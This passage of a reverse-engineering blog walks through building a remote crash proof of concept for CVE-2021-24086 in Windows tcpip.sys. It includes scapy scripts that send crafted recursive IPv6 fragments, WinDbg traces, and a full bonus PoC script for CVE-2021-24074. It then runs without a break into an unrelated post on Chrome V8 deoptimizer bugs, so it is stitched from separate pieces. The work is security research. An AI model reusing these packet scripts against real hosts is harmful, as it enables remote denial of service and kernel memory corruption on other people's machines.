  *(_QWORD *)&Reassembly->Ipv6 = *(_QWORD *)Packet->Ipv6Hdr;
}

• 3 - The fragment is then added into the Reassembly as part of a group of fragments by IppReassemblyInsertFragment. On top of that, if we have received every fragment necessary to start a reassembly, the function Ipv6pReassembleDatagram is invoked. Remember this guy? This is the function that has been patched and that we hit earlier in the post. But this time, we understand how we got there.

At this stage we have an OK understanding of the data structures involved to keep track of groups of fragments and how/when reassembly gets kicked off. We've also commented and refined various structure fields that we lifted early in the process; this is very helpful because now we can understand the fix for the vulnerability:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  //...
  UnfragmentableLength = Reassembly->UnfragmentableLength;
  TotalLength = UnfragmentableLength + Reassembly->DataLength;
  // Below is the code added by the patch
  if ( TotalLength > 0xFFFF ) {
    // Bail
  }


How cool is that? That's really rewarding. You put in a bunch of work that may not feel that useful at the time, but it eventually adds up, snowballs, and really moves the needle forward. It's just a slow process and you gotta get used to it; that's just how the sausage is made.

Let's not get ahead of ourselves though, the emotional rollercoaster is right around the corner :)

## Hiding in plain sight

All right - at this point I think we are done with zooming out and understanding the big picture. We understand the beast well enough to get back to this BSoD. After reading Ipv6pReassembleDatagram a few times, I honestly couldn't figure out where the advertised crash could happen. Pretty frustrating. That is why I decided instead to use the debugger to modify Reassembly->DataLength and UnfragmentableLength at runtime and see if this could give me any hints. The first one didn't seem to do anything, but the second one bugchecked the machine with a NULL dereference; bingo, that is looking good!

After carefully analyzing the crash, I started to realize that the potential issue had been hiding in plain sight in front of my eyes; here is the code:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  // ...
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
    IppReassemblyNetBufferListsComplete,
    Reassembly,
    0i64,
    0i64,
    0,
    0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  // ...
  *Buffer = Reassembly->Ipv6;


NetioAllocateAndReferenceNetBufferAndNetBufferList allocates a brand new NBL called NetBufferList. Then NetioRetreatNetBuffer is called:

NDIS_STATUS NetioRetreatNetBuffer(_NET_BUFFER *Nb, ULONG Amount, ULONG DataBackFill)
{
  const uint32_t CurrentMdlOffset = Nb->CurrentMdlOffset;
  if ( CurrentMdlOffset < Amount )
    return NdisRetreatNetBufferDataStart(Nb, Amount, DataBackFill, NetioAllocateMdl);
  Nb->DataOffset -= Amount;
  Nb->DataLength += Amount;
  Nb->CurrentMdlOffset = CurrentMdlOffset - Amount;
  return 0;
}


Because the FirstNetBuffer just got allocated, it is empty and most of its fields are zero. This means that NetioRetreatNetBuffer triggers a call to NdisRetreatNetBufferDataStart, which is publicly documented. According to the documentation, it allocates an MDL using NetioAllocateMdl, since the network buffer is empty as we mentioned above. One thing to notice is that the amount of bytes, HeaderAndOptionsLength, passed to NetioRetreatNetBuffer is truncated to a uint16_t; odd.

  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )


Now that there is backing space in the NB for the IPv6 header as well as the unfragmentable part of the packet, the function needs a pointer to the backing data in order to populate the buffer. NdisGetDataBuffer is documented as a way to gain access to a contiguous block of data from a NET_BUFFER structure. After reading the documentation several times it was still a little bit confusing to me, so I figured I'd throw NDIS in IDA and have a look at the implementation:

PVOID NdisGetDataBuffer(PNET_BUFFER NetBuffer, ULONG BytesNeeded, PVOID Storage, UINT AlignMultiple, UINT AlignOffset)
{
  const _MDL *CurrentMdl = NetBuffer->CurrentMdl;
  if ( !BytesNeeded || !CurrentMdl || NetBuffer->DataLength < BytesNeeded )
    return 0i64;
  // ...


Just looking at the beginning of the implementation, something stands out. As NdisGetDataBuffer is called with HeaderAndOptionsLength (not truncated), we should be able to hit the NetBuffer->DataLength < BytesNeeded condition when HeaderAndOptionsLength is larger than 0xffff. Why, you ask? Let's take an example. If HeaderAndOptionsLength is 0x1337, NetioRetreatNetBuffer allocates a backing buffer of 0x1337 bytes and NdisGetDataBuffer returns a pointer to the newly allocated data; works as expected. Now imagine that HeaderAndOptionsLength is 0x31337. NetioRetreatNetBuffer allocates only 0x1337 bytes (because of the truncation), but NdisGetDataBuffer is called with 0x31337, which makes the call fail: the network buffer is not big enough, and we hit the NetBuffer->DataLength < BytesNeeded condition.
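The mismatch is easy to model with a few lines of Python (retreat_then_get is a made-up name; it only mirrors the two size computations above, nothing more):

```python
# Toy model of the truncation mismatch between NetioRetreatNetBuffer
# (which sees the length truncated to a uint16_t) and NdisGetDataBuffer
# (which sees the full 32-bit length).
def retreat_then_get(header_and_options_length):
    allocated = header_and_options_length & 0xffff  # uint16_t(HeaderAndOptionsLength)
    data_length = allocated                         # the NB now backs this many bytes
    bytes_needed = header_and_options_length        # full value passed to NdisGetDataBuffer
    if data_length < bytes_needed:                  # NetBuffer->DataLength < BytesNeeded
        return None                                 # NdisGetDataBuffer returns NULL
    return allocated

retreat_then_get(0x1337)   # fine: 0x1337 bytes allocated, 0x1337 requested
retreat_then_get(0x31337)  # None: only 0x1337 bytes back a 0x31337-byte request
```

Anything above 0xffff makes the availability check fail, and the NULL return value is then dereferenced by the caller.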

As the returned pointer is trusted not to be NULL, Ipv6pReassembleDatagram carries on by using it for a memory write:

  *Buffer = Reassembly->Ipv6;


This is where it should bugcheck. As usual we can verify our understanding of the function with a WinDbg session. Here is a simple Python script that sends two fragments:

from scapy.all import *

# Fragment identification shared by the two fragments.
frag_id = 0x1337
first = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = frag_id, m = 1, offset = 0) \
    / UDP(sport = 0x1122, dport = 0x3344) \
    / '---frag1'

second = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = frag_id, m = 0, offset = 2) \
    / '---frag2'

sendp([first, second], iface = 'eth1')


Let's see what the reassembly looks like when those packets are received:

kd> bp tcpip!Ipv6pReassembleDatagram

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff800117cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> p
tcpip!Ipv6pReassembleDatagram+0x5:
fffff800117cdd71 48894c2408      mov     qword ptr [rsp+8],rcx

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0x9c:
fffff800117cde08 48ff1569660700  call    qword ptr [tcpip!_imp_NetioAllocateAndReferenceNetBufferAndNetBufferList (fffff80011844478)]

kd>
tcpip!Ipv6pReassembleDatagram+0xa3:
fffff800117cde0f 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=ffffc107f7be1d90 <- this is the allocated NBL

kd> !ndiskd.nbl @rax
NBL                ffffc107f7be1d90    Next NBL           NULL
First NB           ffffc107f7be1f10    Source             NULL
Pool               ffffc107f58ba980 - NETIO
Flags              NBL_ALLOCATED

Walk the NBL chain                     Dump data payload
Show out-of-band information           Display as Wireshark hex dump

; The first NB is empty; its length is 0 as expected

kd> !ndiskd.nb ffffc107f7be1f10
NB                 ffffc107f7be1f10    Next NB            NULL
Length             0                   Source pool        ffffc107f58ba980
First MDL          0                   DataOffset         0
Current MDL        [NULL]              Current MDL offset 0

View associated NBL

// ...

kd> r @rcx, @rdx
rcx=ffffc107f7be1f10 rdx=0000000000000028 <- the first NB and the size to allocate for it

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff800117cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff80011691354)

kd> p
tcpip!Ipv6pReassembleDatagram+0xde:
fffff800117cde4a 85c0            test    eax,eax

; The first NB now has 0x28 bytes backing MDL

kd> !ndiskd.nb ffffc107f7be1f10
NB                 ffffc107f7be1f10    Next NB            NULL
Length             0n40                Source pool        ffffc107f58ba980
First MDL          ffffc107f5ee8040    DataOffset         0n56
Current MDL        [First MDL]         Current MDL offset 0n56

View associated NBL

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff800117cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff80011844178)]

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff800117cde71 0f1f440000      nop     dword ptr [rax+rax]

; This is the backing buffer; it has leftover data, but gets initialized later

kd> db @rax
ffffc107f5ee80b0  05 02 00 00 01 00 8f 00-41 dc 00 00 00 01 04 00  ........A.......


All right, so it sounds like we have a plan - let's get to work.

## Manufacturing a packet of death: chasing phantoms

Well... sending a packet with a large header should be trivial, right? That's what I initially thought. After trying various things to achieve this goal, I quickly realized it wouldn't be that easy. The main issue is the MTU: network devices won't let you send packets larger than roughly 1,500 bytes. Online content suggests that some Ethernet cards and network switches allow you to bump this limit. Because I was running my tests in my own Hyper-V lab, I figured it was fair enough to try to reproduce the NULL dereference with non-default parameters, so I looked for a way to increase the MTU on the virtual switch to 64KB.

The issue is that Hyper-V didn't allow me to do that. The only parameter I found let me bump the limit to about 9KB, which is very far from the 64KB I needed to trigger the issue. At this point I felt frustrated: so close, but no cigar. Even though I had read that this vulnerability could be triggered over the internet, I kept going in this wrong direction. If it could be thrown from the internet, it had to traverse regular network equipment, and there was no way a 64KB packet would survive that. But I ignored this hard truth for a while.

Eventually, I accepted that I was probably heading in the wrong direction, ugh. So I reevaluated my options. I figured that the bugcheck I triggered above was not one I would be able to trigger with packets thrown from the internet. Maybe, though, there was another code path with a very similar pattern (retreat + NdisGetDataBuffer) that would result in a bugcheck. I noticed that the TotalLength field is also truncated a bit further down in the function and written into the IPv6 header of the packet. This header is eventually copied into the final reassembled IPv6 header:

// The ROR2 is basically htons.
// One weird thing here is that TotalLength is truncated to 16b.
// We are able to make TotalLength >= 0x10000 by crafting a large
// packet via fragmentation.
// The issue with that is that the size in the IPv6 header is smaller than
// the real total size. It's kinda hard to see how this would cause
// subsequent issues but hmm, yeah.
Reassembly->Ipv6.length = __ROR2__(TotalLength, 8);
// B00m, Buffer can be NULL here because of the issue discussed above.
// This copies the saved IPv6 header from the first fragment into the
// first part of the reassembled packet.
*Buffer = Reassembly->Ipv6;


My theory was that there might be some code that reads this Ipv6.length (which is truncated, as __ROR2__ expects a uint16_t) and that something bad might happen as a result. The length would end up smaller than the actual size of the packet, though; it was hard for me to come up with a scenario where this would cause an issue, but I chased this theory anyway, as it was the only thing I had.
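To make the truncation concrete, here is a small Python model of __ROR2__ (IDA's 16-bit rotate-right helper; for a rotate count of 8 it is just a byte swap, i.e. htons on a little-endian host):

```python
def ror2(value, count):
    """Model of IDA's __ROR2__: rotate a 16-bit value right by `count` bits.
    The argument is truncated to 16 bits first, like a uint16_t parameter."""
    value &= 0xffff
    count %= 16
    return ((value >> count) | (value << (16 - count))) & 0xffff

# Rotating by 8 swaps the two bytes, i.e. htons() on a little-endian host.
ror2(0x1337, 8)   # -> 0x3713
# A reassembled TotalLength of 0x10010 is truncated to 0x0010 before the
# rotate, so the IPv6 header advertises far fewer bytes than the packet
# really carries.
ror2(0x10010, 8)  # -> 0x1000
```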

What I started to do at this point was to audit every demuxer we saw earlier. I looked for ones that would use this length field somehow, and for similar retreat / NdisGetDataBuffer patterns. Nothing. Thinking I might be missing something statically, I also heavily used WinDbg to verify my work. I used hardware breakpoints to track access to those two bytes, but no hit. Ever. Frustrating.

After trying and trying, I started to think that I might have been heading in the wrong direction again. Maybe I really needed to find a way to send such a large packet without violating the MTU. But how?

## Manufacturing a packet of death: leap of faith

All right, so I decided to start fresh again. Going back to the big picture, I studied the reassembly algorithm a bit more and diffed again in case I had missed a clue somewhere, but nothing...

Could I maybe fragment a packet that has a very large header and trick the stack into reassembling the reassembled packet? We've seen previously that we could use reassembly as a primitive to stitch fragments together; so instead of trying to send a very large fragment, maybe we could break a large one down into smaller ones and have them stitched together in memory. It honestly felt like a long leap, but based on my reverse-engineering effort I didn't see anything that would prevent it. The idea was blurry but felt worth a shot. How would it really work, though?

Sitting down for a minute, this is the theory I came up with: create a very large fragment with many headers, enough to trigger the bug assuming I could trigger another reassembly, then fragment this fragment so that it can be sent to the target without violating the MTU.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
    ]) \
    # ....
    / IPv6ExtHdrDestOpt(options = [
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum = 0x7e7f)

reassembled_pkt = bytes(reassembled_pkt)
frags = frag6(args.target, frag_id, reassembled_pkt, 60)
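frag6 is a small helper whose implementation isn't shown here; conceptually, it just slices the oversized fragment into MTU-sized pieces. A minimal sketch of the offset math it has to get right (split_into_fragments is a made-up name; IPv6 fragment offsets are expressed in 8-byte units, so every piece except the last must carry a multiple of 8 bytes):

```python
def split_into_fragments(payload, piece_size):
    """Slice `payload` into (offset-field, m-bit, data) tuples, the way an
    IPv6 fragmenter would. Offsets are in 8-byte units."""
    assert piece_size % 8 == 0, 'non-final fragments must be multiples of 8'
    frags = []
    for off in range(0, len(payload), piece_size):
        chunk = payload[off:off + piece_size]
        more = off + piece_size < len(payload)  # the 'm' (more fragments) bit
        frags.append((off // 8, more, chunk))
    return frags

# 144 bytes in 56-byte pieces: offsets 0, 7 and 14; only the last has m=0.
frags = split_into_fragments(b'A' * 144, 56)
```

The receiving stack simply concatenates the pieces at offset * 8, which is exactly the stitching primitive the attack relies on.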


The reassembly happens and tcpip.sys builds this huge reassembled fragment in memory; which is great, as I didn't think it would work. Here is what it looks like in WinDbg:

kd> bp tcpip+01ADF71 ".echo Reassembled NB; r @r14;"

kd> g
Reassembled NB
r14=ffff800fa2a46f10
tcpip!Ipv6pReassembleDatagram+0x205:
fffff8010a7cdf71 41394618        cmp     dword ptr [r14+18h],eax

kd> !ndiskd.nb @r14
NB                 ffff800fa2a46f10    Next NB            NULL
Length                10020            Source pool        ffff800fa06ba240
First MDL          ffff800fa0eb1180    DataOffset         0n56
Current MDL        [First MDL]         Current MDL offset 0n56

View associated NBL

kd> !ndiskd.nbl ffff800fa2a46d90
NBL                ffff800fa2a46d90    Next NBL           NULL
First NB           ffff800fa2a46f10    Source             NULL
Pool               ffff800fa06ba240 - NETIO
Flags              NBL_ALLOCATED

Walk the NBL chain                     Dump data payload
Show out-of-band information           Display as Wireshark hex dump

kd> !ndiskd.nbl ffff800fa2a46d90 -data
NET_BUFFER ffff800fa2a46f10
MDL ffff800fa0eb1180
ffff800fa0eb11f0  60 00 00 00 ff f8 3c 40-fe 80 00 00 00 00 00 00  ·····<@········
ffff800fa0eb1200  02 15 5d ff fe e4 30 0e-ff 02 00 00 00 00 00 00  ··]···0·········
ffff800fa0eb1210  00 00 00 00 00 00 00 01                          ········

...

MDL ffff800f9ff5e8b0
ffff800f9ff5e8f0  3c e1 01 ff 61 61 61 61-61 61 61 61 61 61 61 61  <···aaaaaaaaaaaa
ffff800f9ff5e900  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e910  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e920  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e930  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e940  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e950  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
ffff800f9ff5e960  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa

...

MDL ffff800fa0937280
ffff800fa09372c0  7a 69 7a 69 00 08 7e 7f                          zizi··~·


What we see above is the reassembled first fragment.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
    ]) \
    # ...
    / IPv6ExtHdrDestOpt(options = [
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum = 0x7e7f)


It is a fragment that is 10020 bytes long, and you can see that the ndiskd extension walks the long MDL chain that describes the content of this fragment. The last MDL is the header of the UDP part of the fragment. What is left to do is to trigger another reassembly. What if we send another fragment that is part of the same group; would this trigger another reassembly?

Well, let's see if the below works I guess:

reassembled_pkt_2 = Ether() \
    / IPv6(dst = args.target) \
    / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \
    / 'doar-e ftw'

sendp(reassembled_pkt_2, iface = args.iface)


Here is what we see in WinDbg:

kd> bp tcpip!Ipv6pReassembleDatagram

; This is the first reassembly; the output packet is the first large fragment

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8054a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

; This is the second reassembly; it combines the first very large fragment, and the second fragment we just sent

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8054a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

...

; Let's see the bug happen live!

kd>
tcpip!Ipv6pReassembleDatagram+0xce:
fffff8054a5cde3a 0fb79424a8000000 movzx   edx,word ptr [rsp+0A8h]

kd>
tcpip!Ipv6pReassembleDatagram+0xd6:
fffff8054a5cde42 498bce          mov     rcx,r14

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff8054a5cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff8054a491354)

kd> r @edx
edx=10 <- truncated size

// ...

kd>
tcpip!Ipv6pReassembleDatagram+0xe6:
fffff8054a5cde52 8b9424a8000000  mov     edx,dword ptr [rsp+0A8h]

kd>
tcpip!Ipv6pReassembleDatagram+0xed:
fffff8054a5cde59 41b901000000    mov     r9d,1

kd>
tcpip!Ipv6pReassembleDatagram+0xf3:
fffff8054a5cde5f 8364242000      and     dword ptr [rsp+20h],0

kd>
tcpip!Ipv6pReassembleDatagram+0xf8:
fffff8054a5cde64 4533c0          xor     r8d,r8d

kd>
tcpip!Ipv6pReassembleDatagram+0xfb:
fffff8054a5cde67 498bce          mov     rcx,r14

kd>
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff8054a5cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff8054a644178)]

kd> r @rdx
rdx=0000000000010010 <- non truncated size

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff8054a5cde71 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=0000000000000000 <- NdisGetDataBuffer returned NULL!!!

kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
(0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805473c46a0 cc              int     3

kd> kc
# Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
11 NDIS!ndisMIndicateNetBufferListsToOpen
17 netvsc!NvscKmclProcessPacket
18 nt!KiInitializeKernel
19 nt!KiSystemStartup


Incredible! We managed to implement the recursive fragmentation idea we discussed. Wow, I really didn't think it would actually work. Moral of the day: don't leave any rocks unturned, follow your intuitions, and reach the state of no unknowns.

# Conclusion

In this post I tried to take you along on my journey to write a PoC for CVE-2021-24086, a true remote DoS vulnerability affecting Windows' tcpip.sys driver, found by Microsoft's own @piazzt. From zero to remote BSoD. The PoC is available on my GitHub: 0vercl0k/CVE-2021-24086.

It was a wild ride mainly because it all looked way too easy and because I ended up chasing a bunch of ghosts.

I am sure that I've lost about 99% of my readers, as it is a fairly long and hairy post, but if you made it all the way here you should come hang out in the newly created Diary of a reverse-engineer Discord: https://discord.gg/4JBWKDNyYs. We're trying to build a community of people enjoying low-level subjects. Hopefully we can also generate more interest in external contributions :)

Last but not least, special greets to the usual suspects: @yrp604 and @__x86 and @jonathansalwan for proof-reading this article.

# Bonus: CVE-2021-24074

Here is the PoC I built based on the high-quality blog post put out by Armis:

# Axel '0vercl0k' Souchet - April 4 2021
# Extremely detailed root-cause analysis was made by Armis:
# https://www.armis.com/resources/iot-security-blog/from-urgent-11-to-frag-44-microsoft-patches-critical-vulnerabilities-in-windows-tcp-ip-stack/
from scapy.all import *
import argparse
import codecs
import random

def trigger(args):
'''
kd> g
oob?
fffff804453c6f7a 4d8d2c1c        lea     r13,[r12+rbx]
kd> p
fffff804453c6f7e 498bd5          mov     rdx,r13
kd> db @r13
ffffb90e85b78220  c0 82 b7 85 0e b9 ff ff-38 00 04 10 00 00 00 00  ........8.......
kd> dqs @r13 l1
ffffb90e85b78220  ffffb90e85b782c0
kd> p
fffff804453c6f81 488d0d58830500  lea     rcx,[tcpip!Ipv4Global (fffff8044541f2e0)]
kd>
fffff804453c6f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804453b5164)
kd> db @rdx
kd> p
fffff804453c6f8d 84c0            test    al,al
kd> r.
al=0000000000000000  al=0000000000000000
kd> p
fffff804453c6f8f 0f85de040000    jne     tcpip!Ipv4pReceiveRoutingHeader+0x663 (fffff804453c7473)
kd>
fffff804453c6f95 498bcd          mov     rcx,r13
kd>
Breakpoint 3 hit
fffff804453c6f98 e8e7dff8ff      call    tcpip!Ipv4UnicastAddressScope (fffff80445354f84)
kd> dqs @rcx l1
ffffb90e85b78220  ffffb90e85b782c0

Call-stack (skip first hit):
kd> kc
# Call Site
02 tcpip!Ipv4pReassembleDatagram
0a nt!KeExpandKernelStackAndCalloutInternal
0b nt!KeExpandKernelStackAndCalloutEx

Snippet:
{
// ...
// kd> db @rax
// ffffdc07ff209170  ff ff 04 00 61 62 63 00-54 24 30 48 89 14 01 48  ....abc.T$0H...H
RoutingHeaderFirst = NdisGetDataBuffer(FirstNetBuffer, Packet->RoutingHeaderOptionLength, &v50[0].qw2, 1u, 0);
NetioAdvanceNetBufferList(NetBufferList, v8);
OptionLenFirst = RoutingHeaderFirst[1];
LenghtOptionFirstMinusOne = (unsigned int)(unsigned __int8)RoutingHeaderFirst[2] - 1;
RoutingOptionOffset = LOBYTE(Packet->RoutingOptionOffset);
if (OptionLenFirst < 7u ||
    LenghtOptionFirstMinusOne > OptionLenFirst - sizeof(IN_ADDR)) {
    // ...
    goto Bail_0;
}
// ...
    '''
    id = random.randint(0, 0xff)
    # dst_ip isn't a broadcast IP because otherwise we fail a check in
    # Ipv4pReceiveRoutingHeader; if we don't take the below branch
    # we don't hit the interesting bits later:
    #   if (Packet->CurrentDestinationType == NlatUnicast) {
    #     v12 = &RoutingHeaderFirst[LenghtOptionFirstMinusOne];
    dst_ip = '192.168.2.137'
    src_ip = '120.120.120.0'
    # UDP
    nh = 17
    content = bytes(UDP(sport = 31337, dport = 31338) / '1')
    one = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 1,
            proto = nh,
            frag = 0,
            id = id,
            options = [IPOption_Security(
                length = 0xb,
                security = 0x11,
                # This is used as an ~upper bound in Ipv4pReceiveRoutingHeader:
                compartment = 0xffff,
                # This is the offset that allows us to index out of the
                # bounds of the second fragment.
                # Keep in mind that the out-of-bounds data is first used
                # before triggering any corruption (in Ipv4pReceiveRoutingHeader):
                #   - IppIsInvalidSourceAddressStrict,
                #   - Ipv4UnicastAddressScope.
                # if (IppIsInvalidSourceAddressStrict(Ipv4Global, &RoutingHeaderFirst[LenghtOptionFirstMinusOne])
                #  || (Ipv4UnicastAddressScope(&RoutingHeaderFirst[LenghtOptionFirstMinusOne]),
                #      v13 = Ipv4UnicastAddressScope(&Packet->RoutingOptionSourceIp),
                #      v14 < v13) )
                # The upper byte of handling_restrictions is RoutingHeaderFirst[2] in the above snippet.
                # An offset of 6 allows us to have &RoutingHeaderFirst[LenghtOptionFirstMinusOne] pointing on
                # one.IP.options.transmission_control_code; last byte is OOB.
                # kd>
                # tcpip!Ipv4pReceiveRoutingHeader+0x178:
                # fffff8045c076f88 e8d7e1feff call    tcpip!IppIsInvalidSourceAddressStrict (fffff8045c065164)
                # kd> db @rdx
                # ffffdc07ff209175  62 63 00 54 24 30 48 89-14 01 48 c0 92 20 ff 07  bc.T$0H...H.. ..
                #                                                             ^
                #                                                             |_ oob
                handling_restrictions = (6 << 8),
                transmission_control_code = b'\x11\xc1\xa8'
            )]
        ) / content[: 8]
    two = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 0,
            proto = nh,
            frag = 1,
            id = id,
            options = [
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_LSRR(
                    pointer = 0x8,
                    routers = ['11.22.33.44']
                ),
            ]
        ) / content[8: ]

    sendp([one, two], iface = 'eth1')

def main():
    parser = argparse.ArgumentParser()
    args = parser.parse_args()
    trigger(args)
    return

if __name__ == '__main__':
    main()


# Modern attacks on the Chrome browser : optimizations and deoptimizations

17 November 2020 at 08:00

## Introduction

Late 2019, I presented at an internal Azimuth Security conference some work on hacking Chrome through its JavaScript engine.

One of the topics I had been playing with at the time was deoptimization, and so I discussed, among other things, vulnerabilities in the deoptimizer. For my talk at InfiltrateCon 2020 in Miami I was planning to discuss several components of V8, one of them being the deoptimizer. But as you all know, things didn't quite go as expected this year and the event has been postponed several times.

This blog post is actually an internal write-up I made for Azimuth Security a year ago and we decided to finally release it publicly.

Also, if you want to get serious about breaking browsers and feel like joining us, we're currently looking for experienced hackers (US/AU/UK/FR or anywhere else remotely). Feel free to reach out on twitter or by e-mail.

Special thanks to the legendary Mark Dowd and John McDonald for letting me publish this here.

For those unfamiliar with TurboFan, you may want to read an Introduction to TurboFan first. Also, Benedikt Meurer gave a lot of very interesting talks that are strongly recommended to anyone interested in better understanding V8's internals.

## Motivation

### The commit

To understand this security bug, it is necessary to delve into V8's internals.

Fixes word64-lowered BigInt in FrameState accumulator

Bug: chromium:1016450
Change-Id: I4801b5ffb0ebea92067aa5de37e11a4e75dcd3c0
Reviewed-by: Georg Neis <[email protected]>
Commit-Queue: Nico Hartmann <[email protected]>


It fixes VisitFrameState and VisitStateValues in src/compiler/simplified-lowering.cc.

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 2e8f40f..abbdae3 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1197,7 +1197,7 @@
// TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
// truncated BigInts.
if (TypeOf(input).Is(Type::BigInt())) {
-          ProcessInput(node, i, UseInfo::AnyTagged());
+          ConvertInput(node, i, UseInfo::AnyTagged());
}

(*types)[i] =
@@ -1220,11 +1220,22 @@
// Accumulator is a special flower - we need to remember its type in
// a singleton typed-state-values node (as if it was a singleton
// state-values node).
+    Node* accumulator = node->InputAt(2);
if (propagate()) {
-      EnqueueInput(node, 2, UseInfo::Any());
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        EnqueueInput(node, 2, UseInfo::AnyTagged());
+      } else {
+        EnqueueInput(node, 2, UseInfo::Any());
+      }
} else if (lower()) {
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        ConvertInput(node, 2, UseInfo::AnyTagged());
+      }
Zone* zone = jsgraph_->zone();
-      Node* accumulator = node->InputAt(2);
if (accumulator == jsgraph_->OptimizedOutConstant()) {
} else {
@@ -1237,7 +1248,7 @@
node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
-                                          accumulator));
+                                          node->InputAt(2)));
}
}


This can be linked to a different commit that adds a related regression test:

Regression test for word64-lowered BigInt accumulator

This issue was fixed in https://chromium-review.googlesource.com/c/v8/v8/+/1873692

Bug: chromium:1016450
Change-Id: I56e1c504ae6876283568a88a9aa7d24af3ba6474
Commit-Queue: Nico Hartmann <[email protected]>
Auto-Submit: Nico Hartmann <[email protected]>
Reviewed-by: Jakob Gruber <[email protected]>
Reviewed-by: Georg Neis <[email protected]>

// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Flags: --allow-natives-syntax --opt --no-always-opt

let g = 0;

function f(x) {
  let y = BigInt.asUintN(64, 15n);
  // Introduce a side effect to force the construction of a FrameState that
  // captures the value of y.
  g = 42;
  try {
    return x + y;
  } catch(_) {
    return y;
  }
}

%PrepareFunctionForOptimization(f);
assertEquals(16n, f(1n));
assertEquals(17n, f(2n));
%OptimizeFunctionOnNextCall(f);
assertEquals(16n, f(1n));
assertOptimized(f);
assertEquals(15n, f(0));
assertUnoptimized(f);


### Long story short

This vulnerability is a bug in the way the simplified lowering phase of TurboFan deals with FrameState and StateValues nodes. Those nodes are related to deoptimization.

During the code generation phase, using those nodes, TurboFan builds deoptimization input data that are used when the runtime bails out to the deoptimizer.

